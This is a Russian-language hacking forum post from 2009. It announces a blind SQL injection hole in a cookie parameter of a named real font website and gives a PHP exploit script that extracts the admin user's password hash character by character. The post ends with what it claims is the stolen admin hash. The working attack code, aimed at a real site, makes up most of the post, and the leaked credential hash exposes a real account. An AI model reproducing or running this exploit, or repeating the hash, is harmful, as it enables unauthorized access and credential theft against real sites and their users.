11.01.2009, 21:14
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
http://www.dafont.com/ PR7
Уязвим куки параметр dfcolorid, перебором достаем хэш любого юзера. Сделал сплоит:
PHP код:
<?php
error_reporting(E_ALL);
set_time_limit(0);
for ($j=1; $j<50; $j++) {
for ($i=1; $i<255; $i++) {
$ch=curl_init();
$ua = 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Widows NT)';
curl_setopt($ch, CURLOPT_URL, "http://www.dafont.com/color.php");
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_REFERER, "http://www.dafont.com/color.php");
curl_setopt($ch, CURLOPT_COOKIE, "PHPSESSID=79302419265e6a9cff6b242ced6723fa; dfu2=221554|c2fe885b93fc3ce0dc1eada368172049; dfcolorid=364822*if(ASCII(SUBSTRING((select password from user where username=0x61646D696E), $j, 1))=$i,2,1)");
$answer=curl_exec($ch);
curl_close($ch);
echo $i."=";
$color=substr($answer,strpos($answer,'name="nbg1"')+33,6);
if ($color=='66FF99') {echo "<br>Найден: ".$i; break;}
}
if ($i>=254) break;
}
?>
Не оптимизирован конечно но пох, за час достает хэш =)
Admin
4d5542b0965999f5aad0fcad908d6d09 |
|
|